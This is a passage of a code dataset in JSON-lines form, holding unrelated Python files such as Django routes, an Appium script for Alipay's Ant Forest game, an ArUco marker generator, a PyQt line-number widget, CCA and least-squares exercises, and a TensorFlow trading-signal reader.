\"/abcd-compile-stats.vmfb\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"build_tools/benchmarks/collect_compilation_statistics_test.py","file_name":"collect_compilation_statistics_test.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"278330505","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\"\"\"\nTests for data formats\n\"\"\"\n\nfrom hub.tests.testutils import TestBase\nfrom hub import formats\nfrom hub.structures.file import FileGroup\n\n\nclass FormatsTests(TestBase):\n TESTS = {\n # first element in considered the main file\n ('mockaroo.com.csv',): formats.CSV,\n ('mockaroo.com.json',): formats.JSON,\n ('mockaroo.com.xlsx',): formats.Excel,\n ('gml/Bahnhoefe.gml', 'gml/Bahnhoefe.gfs', 'gml/Bahnhoefe.xsd',): formats.GML,\n ('json/Bahnhoefe.json',): formats.GeoJSON,\n ('kml/Bahnhoefe.kml',): formats.KML,\n ('shp/Bahnhoefe.shp', 'shp/Bahnhoefe.shx', 'shp/Bahnhoefe.dbf', 'shp/Bahnhoefe.ili'): formats.Shapefile,\n }\n\n def test_identification(self):\n for files, format in self.TESTS.iteritems():\n fg = FileGroup.from_files(*[TestBase.get_test_file_path(f) for f in files])\n self.assertIs(formats.identify(fg[0]), format)\n","sub_path":"src/main/python/hub/tests/tests_formats.py","file_name":"tests_formats.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"328183228","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Imprima la suma de la segunda columna del archivo `data.csv`.\n##\n## Rta/\n## 190\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nfile = open(\"data.csv\",\"r\").readlines()\n\nsuma = 0\n\nfor i in range(len(file)):\n suma += int(file[i].split(\"\\t\")[1])\n\nprint(suma)\n","sub_path":"03-python=1/q01=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"324845237","text":"from django.conf.urls import url, include\nfrom rest_framework.routers import SimpleRouter\n\nfrom .views import BlogView, TodoView, CurrentUserView\n\nrouter = SimpleRouter(trailing_slash=False)\nrouter.register(\"blog\", BlogView)\nrouter.register(\"todo\", TodoView)\n\nurlpatterns = [\n url(r'^user$', CurrentUserView.as_view(), name='current_user'),\n url(r'^', include(router.urls, namespace='blog')),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"71918121","text":"# edit by xdd\n# Before running this script, open appium.exe\n# Reference site:https://www.cnblogs.com/deliaries/archive/2020/03/18/12410835.html\n\n\ndef run():\n import time\n from appium import webdriver\n from appium.webdriver.common.touch_action import TouchAction\n start = time.perf_counter() # 计算程序运行时间\n ''' ---------- 打开支付宝 ---------- '''\n desired_caps = {\n \"platformName\": \"Android\",\n \"deviceName\": \"MI 6X\",\n \"appPackage\": \"com.eg.android.AlipayGphone\",\n \"appActivity\": \"com.eg.android.AlipayGphone.AlipayLogin\",\n \"noReset\": \"true\",\n \"fullReset\": \"false\",\n \"automationName\": \"UiAutomator1\"\n }\n server = 'http://localhost:4723/wd/hub'\n print('正在打开支付宝01')\n driver = webdriver.Remote(server, desired_caps) # 启用两次,是因为锁屏打开手机一次有可能打不开\n time.sleep(5)\n print('正在重新打开支付宝02')\n driver = webdriver.Remote(server, desired_caps)\n time.sleep(5)\n print('正在打开蚂蚁森林')\n try:\n driver.find_element_by_xpath(\"//*[@text='蚂蚁森林']\").click() # 点击蚂蚁森林\n except:\n TouchAction(driver).press(x=535, y=750).release().perform() # 蚂蚁森林的图标位置,我的在首页,不在的话,要先打开更多\n #TouchAction(driver).press(x=544, y=706).release().perform() # 蚂蚁森林的图标位置,我的在首页,不在的话,要先打开更多\n # 点击蚂蚁森林(以id打开,这种较好,但是appium有些故障,刷新不出来\n # driver.find_element_by_id('com.alipay.android.phone.wallet.homemarket:id/app_group_item_icon').click()\n time.sleep(5)\n ''' ---------- 收取自己的能量 ---------- '''\n try:\n print('正在收取自己能量')\n items = driver.find_elements_by_class_name(\"android.widget.Button\")\n # print(items)\n name = driver.find_element_by_id('com.alipay.mobile.nebula:id/h5_tv_title').text\n if len(items) > 14:\n for i in items:\n if '能量' in i.text:\n i.click()\n print('我点')\n time.sleep(0.5)\n except:\n pass\n\n ''' 在蚂蚁森林界面,向下滑,找到更多好友,点击 '''\n print('正在打开更多好友')\n time.sleep(2)\n n = 0\n while n <= 5:\n start_x = 500\n start_y = 1500\n distance = 1000\n driver.swipe(start_x, start_y, start_x, start_y - distance)\n n = n + 1\n time.sleep(0.2)\n driver.find_element_by_xpath(\"//*[@text='查看更多好友']\").click() # 点击查看更多好友\n time.sleep(1)\n driver.find_element_by_xpath(\"//*[@text='总排行榜']\").click() # 点击总排行榜\n # ----------- 进入偷能量界面 ---------- '''\n while True:\n TouchAction(driver).press(x=345, y=481).release().perform() # 第一个蚂蚁好友框框的坐标,随着滑动,每一个好友都会出现在这个坐标点\n # time.sleep(0.5) # 等一会让系统进入这个界面\n\n name = driver.find_element_by_id('com.alipay.mobile.nebula:id/h5_tv_title').text\n print('正在查看{0}'.format(name))\n if name in ['陈欣的蚂蚁森林','崔鼎正的蚂蚁森林']: # 填写最后一个好友昵称,程序不会遍历到最后一个,因为到最后的时候,界面不能滑动;可先填最后一个,看能遍历到哪一个好友,再修改即可.\n break\n\n items = driver.find_elements_by_class_name(\"android.widget.Button\")\n # print(len(items),'\\n',items)\n if len(items) > 6: # 执行此项是界面界面有东西(能量或者不可点能量)在自己的名字栏,因len(items)=0<5,会直接向上划过\n try:\n for i in items:\n if '能量' in i.text:\n print('我点点')\n i.click()\n time.sleep(0.5)\n TouchAction(driver).press(x=69, y=138).release().perform() # 左上角返回\n time.sleep(0.2)\n except:\n pass\n elif len(items) > 1: # 执行此项的是能量界面为空的好友;\n TouchAction(driver).press(x=69, y=138).release().perform() # 左上角返回\n time.sleep(0.2)\n else: # 加执行此项的是 点击无反应的界面,和自己的名字栏,(len=0)不能左上角返回\n pass\n start_x = 500\n start_y = 1910\n distance = 187 # 一个框的高度\n driver.swipe(start_x, start_y, start_x, start_y - distance) # 向上滑动一个框的高度 # driver.swipe(分别表示滑动的起始和终点位置的 x/y 坐标)\n time.sleep(0.5) # 系统反应也需要时间,此处sleep()不可省略\n\n TouchAction(driver).press(x=995, y=129).release().perform() # 右上角退出,蚂蚁森林\n time.sleep(2)\n print('正在打开蚂蚁森林')\n TouchAction(driver).press(x=544, y=706).release().perform()\n\n end = time.perf_counter()\n tim = end - start\n txtshow = '偷能量完成,运行这段代码用时:{:.6f}秒'.format(tim)\n print(txtshow)\n\n","sub_path":"蚂蚁森林/EnergyFast.py","file_name":"EnergyFast.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"219155298","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport filer.fields.image\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('filer', '0001_initial'),\n ('excursions', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='excursion',\n name='image',\n field=filer.fields.image.FilerImageField(related_name=b'excursion_images', blank=True, to='filer.Image', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='excursion',\n name='img_preview',\n field=filer.fields.image.FilerImageField(related_name=b'small_preview', blank=True, to='filer.Image', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"apps/excursions/migrations/0002_auto_20150109_0319.py","file_name":"0002_auto_20150109_0319.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"126438225","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n**************************************************************************\r\n* E-Yantra Robotics Competition\r\n* ================================\r\n* This software is intended to check version compatiability of open source software\r\n* Theme: ANT BOT\r\n* MODULE: Task1.1\r\n* Filename: Task1.1.py\r\n* Version: 1.0.0 \r\n* Date: October 31, 2018\r\n* \r\n* Author: e-Yantra Project, Department of Computer Science\r\n* and Engineering, Indian Institute of Technology Bombay.\r\n* \r\n* Software released under Creative Commons CC BY-NC-SA\r\n*\r\n* For legal information refer to:\r\n* http://creativecommons.org/licenses/by-nc-sa/4.0/legalcode \r\n* \r\n*\r\n* This software is made available on an “AS IS WHERE IS BASIS”. \r\n* Licensee/end user indemnifies and will keep e-Yantra indemnified from\r\n* any and all claim(s) that emanate from the use of the Software or \r\n* breach of the terms of this agreement.\r\n* \r\n* e-Yantra - An MHRD project under National Mission on Education using \r\n* ICT(NMEICT)\r\n*\r\n**************************************************************************\r\n\"\"\"\r\n\r\n\"\"\"\r\nArUco ID Dictionaries: 4X4 = 4-bit pixel, 4X4_50 = 50 combinations of a 4-bit pixel image\r\nList of Dictionaries in OpenCV's ArUco library:\r\nDICT_4X4_50\t \r\nDICT_4X4_100\t \r\nDICT_4X4_250\t \r\nDICT_4X4_1000\t \r\nDICT_5X5_50\t \r\nDICT_5X5_100\t \r\nDICT_5X5_250\t \r\nDICT_5X5_1000\t \r\nDICT_6X6_50\t \r\nDICT_6X6_100\t \r\nDICT_6X6_250\t \r\nDICT_6X6_1000\t \r\nDICT_7X7_50\t \r\nDICT_7X7_100\t \r\nDICT_7X7_250\t \r\nDICT_7X7_1000\t \r\nDICT_ARUCO_ORIGINAL\r\n\r\nReference: http://hackage.haskell.org/package/opencv-extra-0.2.0.1/docs/OpenCV-Extra-ArUco.html\r\n\"\"\"\r\n\r\nimport numpy\r\nimport cv2\r\nimport cv2.aruco as aruco\r\ninp_dict = [aruco.DICT_4X4_50, aruco.DICT_4X4_50, aruco.DICT_5X5_250, aruco.DICT_5X5_250] #Enter the required nXn and C from the list above in the required order\r\nid = [6, 29, 30, 199] #Enter the required IDs in the corresponding order\r\ni = 0\r\n\r\ndef aruco_gen(id_aruco, num_pixels):\r\n aruco_dict = aruco.Dictionary_get(inp_dict[i]) #replace n with no. of bits per pixel and C with the no. of combinations\r\n #select n and C from the list mentioned above\r\n img = aruco.drawMarker(aruco_dict, id_aruco, num_pixels)\r\n '''\r\n # cv2.imshow('frame',img)\r\n # cv2.waitKey(0)\r\n '''\r\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) # converts greyscale to bgr\r\n img = cv2.copyMakeBorder(img, 25, 25, 25, 25, borderType = cv2.BORDER_CONSTANT, value = [255, 255, 255]) # creates a white border\r\n # cv2.rectangle(border, (120,0),(380,22),(0,255,0))\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n text = cv2.getTextSize('ArUco ID = 26', font, 1, 1)\r\n width = (num_pixels + 50 - text[0][0]) // 2\r\n height = (text[0][1] + 8)\r\n img = cv2.putText(img, 'ArUco ID = ' + str(id_aruco), (width, height), font, 1, (0, 0, 255), 1, cv2.LINE_AA)\r\n # print(text)\r\n cv2.imwrite('ArUco'+str(id_aruco)+'.jpg', img)\r\n cv2.imshow('ArUco'+ str(id_aruco), img)\r\n cv2.waitKey(0) # Press esc to view the next generated AruCo Marker\r\n cv2.destroyAllWindows()\r\n '''\r\n code here for saving the Aruco image as a \"jpg\" by following the steps below:\r\n 1. save the image as a colour RGB image in OpenCV color image format\r\n 2. embed a boundary of 25 pixels on all four sides and three channels of the image\r\n 3. save the image as \"ArUcoID.jpg\" where ID is the digits of id_aruco i.e. if the ID is 26 the name should be: ArUco26.jpg\r\n 4. APIs which are permitted to be used are:\r\n a. cvtColor\r\n b. imwrite\r\n and other OpenCV APIs.\r\n 5. You are permitted to modify n, C and variables id_aruco and num_pixels\r\n '''\r\nif __name__ == \"__main__\":\r\n for j in range(len(id)):\r\n aruco_gen(id[j], 400) # Calls the funtion for every id\r\n i+=1 # Keeps a track of the corresponding format of the IDs\r\n","sub_path":"Task 1/AB_426#0_426_Task1.1_Solution/426_Task1.1/Code/426_Task1.1.py","file_name":"426_Task1.1.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616232939","text":"# Copyright (C) 2009 John Schember, 2011-2013 nycz\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n# Note: taken from http://john.nachtimwald.com/2009/08/15/qtextedit-with-line-numbers/\n# Or more precisely: http://www.japh.de/blog/qtextedit-with-line-numbers/\n\n\nfrom PyQt4 import QtGui\n\n\nclass LineTextWidget(QtGui.QPlainTextEdit):\n\n def append(self,string):\n self.appendPlainText(string)\n\n class NumberBar(QtGui.QWidget):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.edit = None\n # This is used to update the width of the control.\n # It is the highest line that is currently visibile.\n self.highest_line = 0\n self.showbar = False\n\n def set_text_edit(self, edit):\n self.edit = edit\n\n def update(self, *args):\n if not self.showbar:\n width = 0\n else:\n width = QtGui.QFontMetrics(self.edit.document().defaultFont()).\\\n width(str(self.highest_line)) + 10\n if self.width() != width:\n self.setFixedWidth(width)\n self.edit.setViewportMargins(width,0,0,0)\n super().update(*args)\n\n def paintEvent(self, event):\n contents_y = 0\n page_bottom = self.edit.viewport().height()\n font_metrics = QtGui.QFontMetrics(self.edit.document().\n defaultFont())\n current_block = self.edit.document().findBlock(self.edit.\n textCursor().\n position())\n\n painter = QtGui.QPainter(self)\n\n # Iterate over all text blocks in the document.\n block = self.edit.firstVisibleBlock()\n viewport_offset = self.edit.contentOffset()\n line_count = block.blockNumber()\n painter.setFont(self.edit.document().defaultFont())\n painter.setPen(QtGui.QColor('darkGray'))\n while block.isValid():\n line_count += 1\n\n # The top left position of the block in the document\n position = self.edit.blockBoundingGeometry(block).topLeft()\\\n + viewport_offset\n # Check if the position of the block is out side of the visible\n # area.\n if position.y() > page_bottom:\n break\n\n # We want the line number for the selected line to be bold.\n bold = False\n if block == current_block:\n bold = True\n font = painter.font()\n font.setBold(True)\n painter.setFont(font)\n\n # Draw the line number right justified at the y position of the\n # line. 3 is a magic padding number. drawText(x, y, text).\n painter.drawText(self.width() - font_metrics.\n width(str(line_count)) - 3,\n round(position.y() + font_metrics.\n ascent()*1.05), str(line_count))\n\n # Remove the bold style if it was set previously.\n if bold:\n font = painter.font()\n font.setBold(False)\n painter.setFont(font)\n\n block = block.next()\n\n self.highest_line = line_count\n painter.end()\n\n super().paintEvent(event)\n\n\n def __init__(self, parent):\n super().__init__(parent)\n\n self.number_bar = self.NumberBar(self)\n self.number_bar.set_text_edit(self)\n\n self.viewport().installEventFilter(self)\n\n # ==== Setting callbacks ========================================\n def set_number_bar_visibility(self, visible):\n self.number_bar.showbar = visible\n self.number_bar.update()\n # ===============================================================\n\n def resizeEvent(self,e):\n self.number_bar.setFixedHeight(self.height())\n super().resizeEvent(e)\n\n def setDefaultFont(self,font):\n self.document().setDefaultFont(font)\n\n def eventFilter(self, object, event):\n # Update the line numbers for all events on the text edit\n # and the viewport.\n # This is easier than connecting all necessary singals.\n if object is self.viewport():\n self.number_bar.update()\n return False\n # Not sure how this would work with super so i'm letting it be //nycz\n return QtGui.QPlainTextEdit.eventFilter(object, event)\n","sub_path":"linewidget.py","file_name":"linewidget.py","file_ext":"py","file_size_in_byte":5726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"653527186","text":"from time import sleep\n#from test_function_flags import checkShare\n\nFLG1 = True\nFLG2 = False\n\ndef checkShare():\n global FLG1, FLG2\n FLG1 = 'from func FLG-1'\n FLG2 = 'from func FLG-2'\n\nwhile True:\n print('FLG1 = ' + str(FLG1))\n print('FLG2 = ' + str(FLG2))\n sleep(.5)\n FLG1 = [1, 2]\n FLG2 = [3, 4]\n print('FLG1 = ' + str(FLG1))\n print('FLG2 = ' + str(FLG2))\n sleep(.5)\n FLG1 = True\n FLG2 = False\n sleep(.5)\n print('FLG1 = ' + str(FLG1))\n print('FLG2 = ' + str(FLG2))\n checkShare()\n sleep(.5)\n \n \n \n","sub_path":"resources/test_flags_between_files.py","file_name":"test_flags_between_files.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"409661759","text":"from sklearn.cross_decomposition import CCA\nimport numpy as np\nimport numpy.linalg as linalg\nimport scipy.sparse as sparse\nimport helpers\nimport matplotlib.pyplot as plt\n\ndef perform_cca_sklearn(x1, x2, n = 1):\n\tcca = CCA(n_components=n)\n\tcca.fit(x1, x2)\n\ty1, y2 = cca.transform(x1, x2)\n\treturn [y1, y2]\n\ndef perform_cca_svd(x, y, k):\n\t# based on http://www.nr.com/whp/notes/CanonCorrBySVD.pdf\n\t# will bet my life this doesn't work at all. don't use it\n\tu1, s1, vt1 = np.linalg.svd(x)\n\tu2, s2, vt2 = np.linalg.svd(y)\n\ts1 = np.diag(s1)\n\ts2 = np.diag(s2)\n\n\tU, S, Vt = np.linalg.svd(u1.T.dot(u2))\n\tS = np.diag(S)\n\n\tU = U[:,:k]\n\tV = Vt.T[:,:k]\n\n\ta = vt1.T.dot(np.linalg.inv(s1)).dot(U)\n\tb = vt2.T.dot(np.linalg.inv(s2)).dot(V)\n\n\txp = x.dot(a)\n\typ = y.dot(b)\n\n\treturn a, b, xp, yp\n\ndef perform_cca(x, y, k):\n\t# based on lecture: http://www.cs.cornell.edu/Courses/cs4786/2015sp/lectures/lec05.pdf\n\n\t# Concatenate the matrices and get the covariance matrix\n\tz = np.hstack((x,y))\n\tzcov = np.cov(z.T)\n\n\t# Used to partition the cov matrix\n\tcov_rows = zcov.shape[0]/2\n\tcov_cols = zcov.shape[1]/2\n\n\t# Partition it\n\tS11 = zcov[:cov_rows,:cov_cols]\n\tS12 = zcov[:cov_rows,cov_cols:]\n\tS21 = zcov[cov_rows:,:cov_cols]\n\tS22 = zcov[cov_rows:,cov_cols:]\n\n\t# Straight from the lecture slides\n\tm1 = linalg.inv(S11).dot(S12).dot(linalg.inv(S22)).dot(S21)\n\tm2 = linalg.inv(S22).dot(S21).dot(linalg.inv(S11)).dot(S12)\n\n\t# Get the top k eigenvectors\n\t#m1_evals, m1_evecs = sparse.linalg.eigs(m1, k=k, which='LM')\n\t#m2_evals, m2_evecs = sparse.linalg.eigs(m2, k=k, which='LM')\n\tm1_evals, m1_evecs = np.linalg.eig(m1)\n\tm2_evals, m2_evecs = np.linalg.eig(m2)\n\n\tm1_sorted_idx = m1_evals.argsort() \n\tm1_sorted_idx = m1_sorted_idx[::-1] # reverse it for dec order\n\tm1_evals = m1_evals[m1_sorted_idx]\n\tm1_evecs = m1_evecs[:,m1_sorted_idx]\n\n\tm2_sorted_idx = m2_evals.argsort() \n\tm2_sorted_idx = m2_sorted_idx[::-1] # reverse it for dec order\n\tm2_evals = m2_evals[m2_sorted_idx]\n\tm2_evecs = m2_evecs[:,m2_sorted_idx]\n\n\t# Turn them into projection matrices\n\tW1 = m1_evecs.T[:k]\n\tW2 = m2_evecs.T[:k]\n\n\t# Project the points\n\tx_centered = (x - np.mean(x))/np.std(x)\n\ty_centered = (y - np.mean(y))/np.std(y)\n\txp = W1.dot(x_centered.T).T\n\typ = W2.dot(y_centered.T).T\n\n\treturn xp, yp\n\n'''\nx = np.random.random((10,10))\ny = x*4\n\nxp, yp = perform_cca(y,x,2)\nplt.scatter(xp[:,0], xp[:,1], color='red', label='first', s=np.pi*10**2)\nplt.scatter(yp[:,0], yp[:,1], color='green', label='second', s=np.pi*5**2)\nplt.show()\n'''\n\n#a,b,u,v = perform_cca(x,y,3)","sub_path":"cca.py","file_name":"cca.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"448188332","text":"#Question-https://www.geeksforgeeks.org/check-given-graph-tree/\n\n#Answer-\nclass Node: \n def __init__(self, data): \n self.data = data \n self.left = self.right = None\n \ndef dispRtL(root): \n if (root == None): \n return\n stack = [] \n stack.append(root) \n parent = {} \n parent[root] = None\n while len(stack) != 0: \n current = stack[-1] \n stack.pop(-1) \n if (not (current.left) and\n not (current.right)): \n displayTtBPath(current, parent) \n if (current.right): \n parent[current.right] = current \n stack.append(current.right) \n if (current.left): \n parent[current.left] = current \n stack.append(current.left) \n\ndef displayTtBPath(curr, parent): \n stk = [] \n while (curr): \n stk.append(curr) \n curr = parent[curr] \n while len(stk) != 0: \n curr = stk[-1] \n stk.pop(-1) \n print(curr.data, end = \" \") \n print() \n\nroot = Node(10) \nroot.left = Node(8) \nroot.right = Node(2) \nroot.left.left = Node(3) \nroot.left.right = Node(5) \nroot.right.left = Node(2) \ndispRtL(root) ","sub_path":"assignments/Week07/Day02_(03-03-2020)/Ques4.py","file_name":"Ques4.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383065027","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nEsercizio 2\n-------------------\n\nPer i dati (x_i, y_i) riportati nei seguenti array:\n x = [0.0004, 0.2507, 0.5008, 2.0007, 8.0013];\n y = [0.0007, 0.0162, 0.0288, 0.0309, 0.0310];\n-- costruire la retta di regressione;\n-- costruire la parabola approssimante i dati nel senso dei minimi quadrati;\n-- costruire la cubica approssimante i dati nel senso dei minimi quadrati;\n\nQuale tra le tre approssimazioni risulta migliore? \nConfrontare i grafici e la norma euclidea al quadrato del vettore dei residui. \n\nNOTE: Si nota che, all'aumentare del grado del polinomio n, la norma al \n quadrato del residuo diminuisce.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport minimi_quadrati as mq\n\nx = np.array([0.0004, 0.2507, 0.5008, 2.0007, 8.0013])\ny = np.array([0.0007, 0.0162, 0.0288, 0.0309, 0.0310])\nx_val = np.linspace(np.min(x), np.max(x), 100)\ny_val = []\n\nfor n in range(1, 4):\n a = mq.QR(x, y, n)\n '''\n Calcolo il residuo: ||y - Ba||^2 dove B è la matrice di Vandermonde, y il vettore colonna \n contenente le ordinate dei punti dati e a è il vettore colonna incognito. \n Dalla teoria (pg. 17) si ha che:\n ||y - Ba||^2 = Σ(y_i - p_n(x_i))^2\n '''\n residuo = np.linalg.norm(y - np.polyval(a, x))**2\n print(\"n = \", n, \"--> Norma al quadrato del residuo =\", residuo)\n '''\n Per graficare la curva valuto il polinomio nei 100 punti equidistanti compresi tra min(x) e max(x).\n In particolare polyval ritorna, detta N la lunghezza di a:\n p[i] = a[0]*x_val[i]**(N-1) + a[1]*x_val[i]**(N-2) + ... + a[N-2]*x_val[i] + a[N-1]\n '''\n p = np.polyval(a, x_val)\n plt.plot(x_val, p)\n\nplt.plot(x, y, 'ro')\nplt.legend(['Retta di regressione', 'Parabola', 'Cubica', 'Dati'])\nplt.show()\n \n","sub_path":"06-minimi-quadrati/es02.py","file_name":"es02.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"533406871","text":"# coding: utf-8\n__author__ = 'Administrator'\nimport Tkinter\nimport math\n''' 画出三角函数曲线'''\n\n\n\ncanvas_width=1000\ncanvas_height=400\n#scale=float(canvas_width/6.25)\nscale=float(80)\ntk = Tkinter.Tk()\ntk.title=\"COS\"\ncanvas = Tkinter.Canvas(tk, width=canvas_width, height=canvas_height)\ncanvas.create_line(0, canvas_height/2, canvas_width, canvas_height/2)\ncanvas.create_line(canvas_width/2, 0, canvas_width/2, canvas_height)\ndef cos_pos(x):\n y=math.cos(x)*scale\n return [int(x*scale),int(y+canvas_height/2)]\n\ndef sin_pos(x):\n y=math.sin(x)*scale\n return [int(x*scale),int(y+canvas_height/2)]\n\n\nfor x in range(0,canvas_width+1):\n x1=x/scale\n canvas.create_line(sin_pos(x1)[0],sin_pos(x1)[1], sin_pos(x1+0.1)[0],sin_pos(x1+0.1)[1] ,fill=\"blue\")\n canvas.create_line(cos_pos(x1)[0],cos_pos(x1)[1], cos_pos(x1+0.1)[0],cos_pos(x1+0.1)[1] ,fill=\"red\")\n\ncanvas.pack()\ncanvas.mainloop()\n","sub_path":"my_math.py","file_name":"my_math.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222045840","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n# Part 2 Module5 Course Work\n\nimport pandas as pd\ngrades_dict = {'Wally': [87, 96, 70], 'Eva': [100, 87, 90], 'Sam': [94, 77, 90], 'Katie': [100, 81, 82], 'Bob': [83, 65, 85]}\n \n\n\n# In[5]:\n\n\ngrades = pd.DataFrame(grades_dict)\n\n\n# In[6]:\n\n\ngrades\n\n\n# In[11]:\n\n\ngrades = pd.DataFrame(grades_dict, index=['Test1', 'Test2', 'Test3'])\ngrades\n\n\n# In[10]:\n\n\ngrades['Eva']\n\n\n# In[12]:\n\n\ngrades.Sam\n\n\n# In[13]:\n\n\ngrades.loc['Test1']\n\n\n# In[14]:\n\n\ngrades.iloc[1]\n\n\n# In[15]:\n\n\ngrades.loc['Test1':'Test3']\n\n\n# In[16]:\n\n\ngrades.iloc[0:2]\n\n\n# In[18]:\n\n\ngrades.loc['Test1']\n\n\n# In[19]:\n\n\ngrades.iloc[0]\n\n\n# In[20]:\n\n\ngrades.iloc[1]\n\n\n# In[21]:\n\n\ngrades.at['Test2', 'Eva']\n\n\n# In[22]:\n\n\ngrades.iat[2,0]\n\n\n# In[23]:\n\n\ngrades.describe()\n\n\n# In[24]:\n\n\ngrades.mean()\n\n\n# In[26]:\n\n\ngrades.sort_index(ascending=False)\n\n\n# In[27]:\n\n\ngrades.sort_index(axis=1)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Module5_Part2.py","file_name":"Module5_Part2.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"327571402","text":"import sys\nimport ta\nimport pandas as pd\nfrom sklearn.preprocessing import minmax_scale\nimport numpy as np\nimport tensorflow as tf\n\nsess=tf.Session() \nsignature_key = tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY\ninput_key = 'x_input'\noutput_key = 'y_output'\n\nimport_path = './decider_python'\nmeta_graph_def = tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], import_path)\nsignature = meta_graph_def.signature_def\n\nx_tensor_name = signature[signature_key].inputs[input_key].name\ny_tensor_name = signature[signature_key].outputs[output_key].name\n\nx = sess.graph.get_tensor_by_name(x_tensor_name)\ny = sess.graph.get_tensor_by_name(y_tensor_name)\n\n\nf = open(\"observations.txt\",\"w\")\n\n\nwhile True:\n\n args = input()\n arg_array = args.split(' ')\n\n timestamps = [ int(n) for n in arg_array[0].split(',') ]\n opens = [ float(n) for n in arg_array[1].split(',') ]\n high = [ float(n) for n in arg_array[2].split(',') ]\n low = [ float(n) for n in arg_array[3].split(',') ]\n close = [ float(n) for n in arg_array[4].split(',') ]\n volume = [ float(n) for n in arg_array[5].split(',') ]\n asset = float(arg_array[6])\n currency = float(arg_array[7])\n profit = float(arg_array[8])\n avgPrice = float(arg_array[9])\n\n\n\n\n df = pd.DataFrame({'Timestamp': timestamps, 'Open': opens, 'High': high, 'Low': low, 'Close': close, 'Volume': volume}).set_index('Timestamp')\n\n\n ta.add_all_ta_features(df, open=\"Open\", high=\"High\", low=\"Low\", close=\"Close\", volume=\"Volume\")\n\n\n columns = df.columns.values.tolist()\n columns.remove('momentum_kama') # was all nans\n\n\n signals = np.nan_to_num(df.loc[:, columns].to_numpy())\n\n signal_features = minmax_scale(signals)\n\n state = signal_features[-1]\n\n obs = np.append(state, [asset, currency, profit, avgPrice])\n\n f.write(str(timestamps[-1])+' '+np.array_str(obs[-5 : -1], precision=5, max_line_width=1200)+'\\n')\n\n pred = sess.run(y, {x: [obs]})\n # print(y)\n # pred = sess.run(y, {x: [state]})\n # print(np.sum(pred[0]))\n print('{d[0]:04.8f} {d[1]:04.8f} {d[2]:04.8f}'.format(d=pred[0])) #output\n\n # for c,v in zip(columns, df.iloc[-1,:]):\n # print(c, v)\n sys.stdout.flush()\n# end while loop","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"603098851","text":"# -*- coding: 